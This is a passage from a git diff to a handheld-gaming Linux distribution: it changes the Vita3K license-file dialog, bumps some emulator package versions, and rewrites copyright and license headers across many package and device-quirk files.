&emuenv) { draw_file_dialog = true; } - } else if (state == "work") { -- result = host::dialog::filesystem::open_file(work_path, { { "PlayStation Vita software license file", { "bin" } } }); + } else if (state == "license") { +- result = host::dialog::filesystem::open_file(license_path, { { "PlayStation Vita software license file", { "bin", "rif" } } }); - if (result == host::dialog::filesystem::Result::SUCCESS) { -- fs::ifstream binfile(work_path.wstring(), std::ios::in | std::ios::binary | std::ios::ate); -+ result = NFD_OpenDialog("bin", nullptr, &work_path); +- fs::ifstream binfile(license_path.wstring(), std::ios::in | std::ios::binary | std::ios::ate); ++ result = NFD_OpenDialog("bin,rif", nullptr, &license_path); + if (result == NFD_OKAY) { -+ fs::ifstream binfile(string_utils::utf_to_wide(std::string(work_path)), std::ios::in | std::ios::binary | std::ios::ate); ++ fs::ifstream binfile(string_utils::utf_to_wide(std::string(license_path)), std::ios::in | std::ios::binary | std::ios::ate); zRIF = rif2zrif(binfile); state = "install"; } else @@ -409,13 +391,13 @@ index 75c11214..46fcf6f8 100644 std::lock_guard lock(install_mutex); state = "success"; } else { -@@ -144,17 +144,17 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { +@@ -143,17 +142,17 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { ImGui::Separator(); ImGui::Spacing(); ImGui::Checkbox(lang["delete_pkg"].c_str(), &delete_pkg_file); -- if (work_path != "") -+ if (work_path) - ImGui::Checkbox(lang["delete_work"].c_str(), &delete_work_file); +- if (license_path != "") ++ if (license_path) + ImGui::Checkbox(lang["delete_bin_rif"].c_str(), &delete_license_file); ImGui::Spacing(); ImGui::SetCursorPos(ImVec2(POS_BUTTON, ImGui::GetWindowSize().y - BUTTON_SIZE.y - (20.f * SCALE.y))); if (ImGui::Button(common["ok"].c_str(), BUTTON_SIZE)) { @@ -424,20 +406,20 @@ index 75c11214..46fcf6f8 100644 + fs::remove(fs::path(string_utils::utf_to_wide(std::string(pkg_path)))); delete_pkg_file = false; } - if (delete_work_file) { -- fs::remove(fs::path(work_path.wstring())); + if (delete_license_file) { +- fs::remove(fs::path(license_path.wstring())); + fs::remove(fs::path(string_utils::utf_to_wide(std::string(pkg_path)))); - delete_work_file = false; + delete_license_file = false; } if ((emuenv.app_info.app_category.find("gd") != std::string::npos) || (emuenv.app_info.app_category.find("gp") != std::string::npos)) { -@@ -162,8 +162,8 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { +@@ -160,8 +160,8 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { save_apps_cache(gui, emuenv); } update_notice_info(gui, emuenv, "content"); - pkg_path = ""; -- work_path = ""; +- license_path = ""; + pkg_path = nullptr; -+ work_path = nullptr; ++ license_path = nullptr; gui.file_menu.pkg_install_dialog = false; draw_file_dialog = true; state.clear(); diff --git a/packages/emulators/standalone/vita3k-sa/scripts/start_vita3k.sh b/packages/emulators/standalone/vita3k-sa/scripts/start_vita3k.sh index 8e35f2a49..e818276b1 100644 --- a/packages/emulators/standalone/vita3k-sa/scripts/start_vita3k.sh +++ b/packages/emulators/standalone/vita3k-sa/scripts/start_vita3k.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 Vita3K" diff --git a/packages/emulators/standalone/xemu-sa/package.mk b/packages/emulators/standalone/xemu-sa/package.mk index dca0e0a35..7314755e9 100644 --- a/packages/emulators/standalone/xemu-sa/package.mk +++ b/packages/emulators/standalone/xemu-sa/package.mk @@ -1,8 +1,8 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="xemu-sa" -PKG_VERSION="v0.7.113" +PKG_VERSION="v0.7.116" PKG_ARCH="x86_64" PKG_LICENSE="GPLv3" PKG_SITE="https://github.com/xemu-project/xemu" diff --git a/packages/emulators/standalone/xemu-sa/scripts/start_xemu.sh b/packages/emulators/standalone/xemu-sa/scripts/start_xemu.sh index 2d4c1d775..68e5b9085 100755 --- a/packages/emulators/standalone/xemu-sa/scripts/start_xemu.sh +++ b/packages/emulators/standalone/xemu-sa/scripts/start_xemu.sh @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 xemu" diff --git a/packages/emulators/standalone/yabasanshiro-sa/package.mk b/packages/emulators/standalone/yabasanshiro-sa/package.mk index 7a00bb13d..9265b7255 100644 --- a/packages/emulators/standalone/yabasanshiro-sa/package.mk +++ b/packages/emulators/standalone/yabasanshiro-sa/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2022-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2022-present 351ELEC -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="yabasanshiro-sa" PKG_LICENSE="GPLv2" diff --git a/packages/emulators/standalone/yabasanshiro-sa/scripts/start_yabasanshiro.sh b/packages/emulators/standalone/yabasanshiro-sa/scripts/start_yabasanshiro.sh index f1449dfa6..a5c945442 100644 --- a/packages/emulators/standalone/yabasanshiro-sa/scripts/start_yabasanshiro.sh +++ b/packages/emulators/standalone/yabasanshiro-sa/scripts/start_yabasanshiro.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/emulators/standalone/yuzu-sa/package.mk b/packages/emulators/standalone/yuzu-sa/package.mk index 1646a3fc2..148bc89fe 100644 --- a/packages/emulators/standalone/yuzu-sa/package.mk +++ b/packages/emulators/standalone/yuzu-sa/package.mk @@ -1,8 +1,8 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="yuzu-sa" -PKG_VERSION="249db0a59bb4aadb031f270ed79044f91defb98d" +PKG_VERSION="6eb3a583cbbb55ebe6dd2409f5f53aef02cff561" PKG_ARCH="x86_64" PKG_LICENSE="GPLv3" PKG_SITE="https://github.com/yuzu-emu/yuzu" diff --git a/packages/emulators/standalone/yuzu-sa/scripts/start_yuzu.sh b/packages/emulators/standalone/yuzu-sa/scripts/start_yuzu.sh index 29d411463..39d3c9046 100755 --- a/packages/emulators/standalone/yuzu-sa/scripts/start_yuzu.sh +++ b/packages/emulators/standalone/yuzu-sa/scripts/start_yuzu.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile @@ -97,6 +97,10 @@ ln -sf /storage/roms/bios/yuzu/keys /storage/.config/yuzu/keys then sed -i '/^aspect_ratio=/c\aspect_ratio=3' /storage/.config/yuzu/qt-config.ini fi + if [ "$ASPECT" = "4" ] + then + sed -i '/^aspect_ratio=/c\aspect_ratio=4' /storage/.config/yuzu/qt-config.ini + fi #GPU Accuracy sed -i '/^gpu_accuracy\\default=/c\gpu_accuracy\\default=false' /storage/.config/yuzu/qt-config.ini diff --git a/packages/emulators/tools/control-gen/Makefile b/packages/emulators/tools/control-gen/Makefile index a2f1cecf2..02335312f 100644 --- a/packages/emulators/tools/control-gen/Makefile +++ b/packages/emulators/tools/control-gen/Makefile @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) CXX ?= gcc CCFLAGS = -W -Wall -std=c++11 `sdl2-config --cflags` diff --git a/packages/emulators/tools/control-gen/control-gen.cpp b/packages/emulators/tools/control-gen/control-gen.cpp index 560e84b7b..8b5396cb7 100644 --- a/packages/emulators/tools/control-gen/control-gen.cpp +++ b/packages/emulators/tools/control-gen/control-gen.cpp @@ -1,5 +1,5 @@ // SPDX-License-Identifier: GPL-2.0-or-later -// Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +// Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) #include #include diff --git a/packages/emulators/tools/control-gen/package.mk b/packages/emulators/tools/control-gen/package.mk index a16e79167..1f1029353 100644 --- a/packages/emulators/tools/control-gen/package.mk +++ b/packages/emulators/tools/control-gen/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="control-gen" PKG_VERSION="95cb4d4f28e1743c6a7f3c0266049f68b2134b60" diff --git a/packages/emulators/tools/control-gen/scripts/control-gen_init.sh b/packages/emulators/tools/control-gen/scripts/control-gen_init.sh index 801c91167..e6029fb5d 100644 --- a/packages/emulators/tools/control-gen/scripts/control-gen_init.sh +++ b/packages/emulators/tools/control-gen/scripts/control-gen_init.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) #Check if gptokeyb exists in .config if [ ! -d "/storage/.config/gptokeyb" ]; then diff --git a/packages/emulators/tools/gamecontrollerdb/package.mk b/packages/emulators/tools/gamecontrollerdb/package.mk index 3cbfd379c..0ae272cf7 100644 --- a/packages/emulators/tools/gamecontrollerdb/package.mk +++ b/packages/emulators/tools/gamecontrollerdb/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gamecontrollerdb" PKG_VERSION="6f3c4edcb5a2e2ed090ca8af40d2c0f00dcd77f6" diff --git a/packages/emulators/tools/jstest-sdl/package.mk b/packages/emulators/tools/jstest-sdl/package.mk index e315f2c0c..af5e78108 100644 --- a/packages/emulators/tools/jstest-sdl/package.mk +++ b/packages/emulators/tools/jstest-sdl/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="jstest-sdl" PKG_VERSION="f4fdf6daae687d19b303d8ba8809ff5a68bc33a4" diff --git a/packages/emulators/tools/retroarch-joypads/package.mk b/packages/emulators/tools/retroarch-joypads/package.mk index 721fd1137..4adde255a 100644 --- a/packages/emulators/tools/retroarch-joypads/package.mk +++ b/packages/emulators/tools/retroarch-joypads/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="retroarch-joypads" PKG_VERSION="0ce2aa145e7ac3ae552bfb15d2c6730e8ceefd56" diff --git a/packages/emulators/tools/sdljoytest/package.mk b/packages/emulators/tools/sdljoytest/package.mk index e57e389bc..f6eb15778 100644 --- a/packages/emulators/tools/sdljoytest/package.mk +++ b/packages/emulators/tools/sdljoytest/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sdljoytest" PKG_VERSION="811d9875e0c13e0c87d93351e69169bf74d28270" diff --git a/packages/emulators/tools/sixaxis/package.mk b/packages/emulators/tools/sixaxis/package.mk index b2fdd1589..4aa663388 100644 --- a/packages/emulators/tools/sixaxis/package.mk +++ b/packages/emulators/tools/sixaxis/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sixaxis" PKG_VERSION="f53b0ca28c35ebd71b54190f33eadcb8c3267186" diff --git a/packages/emulators/tools/sixpair/package.mk b/packages/emulators/tools/sixpair/package.mk index b4ab3f2c0..81aed2124 100644 --- a/packages/emulators/tools/sixpair/package.mk +++ b/packages/emulators/tools/sixpair/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sixpair" PKG_VERSION="23e6e087fe7f013128ce2e0e19a8f4b04fa7a6e8" diff --git a/packages/emulators/tools/xa/package.mk b/packages/emulators/tools/xa/package.mk index c6ae5fe5c..5506977e1 100644 --- a/packages/emulators/tools/xa/package.mk +++ b/packages/emulators/tools/xa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="xa" PKG_VERSION="2.3.14" diff --git a/packages/fonts/spleen-font/package.mk b/packages/fonts/spleen-font/package.mk index c63230b75..e61fd604b 100644 --- a/packages/fonts/spleen-font/package.mk +++ b/packages/fonts/spleen-font/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="spleen-font" PKG_VERSION="2.0.0" diff --git a/packages/graphics/SDL2/SDL_sound/package.mk b/packages/graphics/SDL2/SDL_sound/package.mk index 0e1955c6a..c787d82a3 100644 --- a/packages/graphics/SDL2/SDL_sound/package.mk +++ b/packages/graphics/SDL2/SDL_sound/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 0riginally created by Escalade (https://github.com/escalade) # Copyright (C) 2018-present 5schatten (https://github.com/5schatten) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="SDL_sound" PKG_VERSION="253b00c" diff --git a/packages/graphics/SDL2/package.mk b/packages/graphics/SDL2/package.mk index 022e04107..849dcca28 100644 --- a/packages/graphics/SDL2/package.mk +++ b/packages/graphics/SDL2/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2018-present 5schatten (https://github.com/5schatten) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="SDL2" PKG_VERSION="2.28.4" diff --git a/packages/graphics/fbgrab/package.mk b/packages/graphics/fbgrab/package.mk index 8aca0a95a..41c86cd40 100644 --- a/packages/graphics/fbgrab/package.mk +++ b/packages/graphics/fbgrab/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="fbgrab" PKG_VERSION="5c2481d2b67b634e4e611610c33d30ef796afe5d" diff --git a/packages/graphics/gl4es/package.mk b/packages/graphics/gl4es/package.mk index b5010af42..f0c35d4e6 100644 --- a/packages/graphics/gl4es/package.mk +++ b/packages/graphics/gl4es/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gl4es" PKG_LICENSE="GPL" diff --git a/packages/graphics/glew/package.mk b/packages/graphics/glew/package.mk index 6b0ed41d0..fd8ee26dc 100644 --- a/packages/graphics/glew/package.mk +++ b/packages/graphics/glew/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="glew" PKG_VERSION="2.2.0" diff --git a/packages/graphics/glfw/package.mk b/packages/graphics/glfw/package.mk index 0158dd2a9..f17392d98 100644 --- a/packages/graphics/glfw/package.mk +++ b/packages/graphics/glfw/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="glfw" PKG_VERSION="3eaf125" diff --git a/packages/graphics/imagemagick/package.mk b/packages/graphics/imagemagick/package.mk index 97794a0b7..aaa490fb4 100644 --- a/packages/graphics/imagemagick/package.mk +++ b/packages/graphics/imagemagick/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="imagemagick" PKG_VERSION="a0a5f3d" diff --git a/packages/graphics/libjpeg-turbo/package.mk b/packages/graphics/libjpeg-turbo/package.mk index b7eb41538..786274575 100644 --- a/packages/graphics/libjpeg-turbo/package.mk +++ b/packages/graphics/libjpeg-turbo/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libjpeg-turbo" PKG_VERSION="3.0.0" diff --git a/packages/graphics/libmali-vulkan/package.mk b/packages/graphics/libmali-vulkan/package.mk index 184f87a9b..fde458db4 100644 --- a/packages/graphics/libmali-vulkan/package.mk +++ b/packages/graphics/libmali-vulkan/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="libmali-vulkan" PKG_VERSION="r40p0-01eac0" diff --git a/packages/graphics/libmali/package.mk b/packages/graphics/libmali/package.mk index 24dc5338b..14c7afe75 100644 --- a/packages/graphics/libmali/package.mk +++ b/packages/graphics/libmali/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libmali" PKG_ARCH="arm aarch64" diff --git a/packages/graphics/wxwidgets/package.mk b/packages/graphics/wxwidgets/package.mk index 224add879..015bf872f 100644 --- a/packages/graphics/wxwidgets/package.mk +++ b/packages/graphics/wxwidgets/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wxwidgets" PKG_VERSION="a7bfae0" diff --git a/packages/hardware/quirks/autostart/020-configs b/packages/hardware/quirks/autostart/020-configs index 4758744b8..8828322ea 100755 --- a/packages/hardware/quirks/autostart/020-configs +++ b/packages/hardware/quirks/autostart/020-configs @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/autostart/999-export b/packages/hardware/quirks/autostart/999-export index b8aa78c8e..8a6cabbc9 100755 --- a/packages/hardware/quirks/autostart/999-export +++ b/packages/hardware/quirks/autostart/999-export @@ -1,5 +1,5 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ln -sf /etc/profile.d/999-export /storage/.config/profile.d diff --git a/packages/hardware/quirks/devices/AYANEO AIR Plus/010-led_control b/packages/hardware/quirks/devices/AYANEO AIR Plus/010-led_control index f49d91971..d651b9b28 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR Plus/010-led_control +++ b/packages/hardware/quirks/devices/AYANEO AIR Plus/010-led_control @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-led_control DEVICE_LED_CONTROL="true" diff --git a/packages/hardware/quirks/devices/AYANEO AIR Plus/020-fan_control b/packages/hardware/quirks/devices/AYANEO AIR Plus/020-fan_control index 803193652..40f532cf7 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR Plus/020-fan_control +++ b/packages/hardware/quirks/devices/AYANEO AIR Plus/020-fan_control @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-fan_control DEVICE_HAS_FAN="false" diff --git a/packages/hardware/quirks/devices/AYANEO AIR Plus/050-modifiers b/packages/hardware/quirks/devices/AYANEO AIR Plus/050-modifiers index fbee92659..d7f05e5f2 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR Plus/050-modifiers +++ b/packages/hardware/quirks/devices/AYANEO AIR Plus/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER="KEY_LEFTCTRL" diff --git a/packages/hardware/quirks/devices/AYANEO AIR Plus/bin/ledcontrol b/packages/hardware/quirks/devices/AYANEO AIR Plus/bin/ledcontrol index 42c1b46ec..d880c9ac1 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR Plus/bin/ledcontrol +++ b/packages/hardware/quirks/devices/AYANEO AIR Plus/bin/ledcontrol @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # A simple tool to manipulate the controller LEDs using outb, thanks # in large part to Maya Matuszczyk (https://github.com/Maccraft123) diff --git a/packages/hardware/quirks/devices/AYANEO AIR/010-led_control b/packages/hardware/quirks/devices/AYANEO AIR/010-led_control index f49d91971..d651b9b28 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR/010-led_control +++ b/packages/hardware/quirks/devices/AYANEO AIR/010-led_control @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-led_control DEVICE_LED_CONTROL="true" diff --git a/packages/hardware/quirks/devices/AYANEO AIR/020-fan_control b/packages/hardware/quirks/devices/AYANEO AIR/020-fan_control index 8c8957596..2847baa3f 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR/020-fan_control +++ b/packages/hardware/quirks/devices/AYANEO AIR/020-fan_control @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-fan_control DEVICE_HAS_FAN="true" diff --git a/packages/hardware/quirks/devices/AYANEO AIR/bin/fancontrol b/packages/hardware/quirks/devices/AYANEO AIR/bin/fancontrol index 04bb413fc..6faa6e15e 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR/bin/fancontrol +++ b/packages/hardware/quirks/devices/AYANEO AIR/bin/fancontrol @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/AYANEO AIR/bin/ledcontrol b/packages/hardware/quirks/devices/AYANEO AIR/bin/ledcontrol index 5722dfa8e..0cd20f7a6 100755 --- a/packages/hardware/quirks/devices/AYANEO AIR/bin/ledcontrol +++ b/packages/hardware/quirks/devices/AYANEO AIR/bin/ledcontrol @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # A simple tool to manipulate the controller LEDs using ectool, thanks to diff --git a/packages/hardware/quirks/devices/Anbernic RG351M/001-device_config b/packages/hardware/quirks/devices/Anbernic RG351M/001-device_config index f7ba5bb53..b47379e97 100644 --- a/packages/hardware/quirks/devices/Anbernic RG351M/001-device_config +++ b/packages/hardware/quirks/devices/Anbernic RG351M/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/Anbernic RG351M/050-game_configs b/packages/hardware/quirks/devices/Anbernic RG351M/050-game_configs index 4c086447b..182b3b3f4 100644 --- a/packages/hardware/quirks/devices/Anbernic RG351M/050-game_configs +++ b/packages/hardware/quirks/devices/Anbernic RG351M/050-game_configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG351M/050-volume b/packages/hardware/quirks/devices/Anbernic RG351M/050-volume index b37b72619..b2c9c28a6 100755 --- a/packages/hardware/quirks/devices/Anbernic RG351M/050-volume +++ b/packages/hardware/quirks/devices/Anbernic RG351M/050-volume @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /storage/.config/profile.d/001-device_config diff --git a/packages/hardware/quirks/devices/Anbernic RG351V/001-deviceconfig b/packages/hardware/quirks/devices/Anbernic RG351V/001-deviceconfig index 5c20dcca9..cd7c1aba0 100644 --- a/packages/hardware/quirks/devices/Anbernic RG351V/001-deviceconfig +++ b/packages/hardware/quirks/devices/Anbernic RG351V/001-deviceconfig @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/Anbernic RG351V/004-game-configs b/packages/hardware/quirks/devices/Anbernic RG351V/004-game-configs index ca8d806be..50ebeb04e 100644 --- a/packages/hardware/quirks/devices/Anbernic RG351V/004-game-configs +++ b/packages/hardware/quirks/devices/Anbernic RG351V/004-game-configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 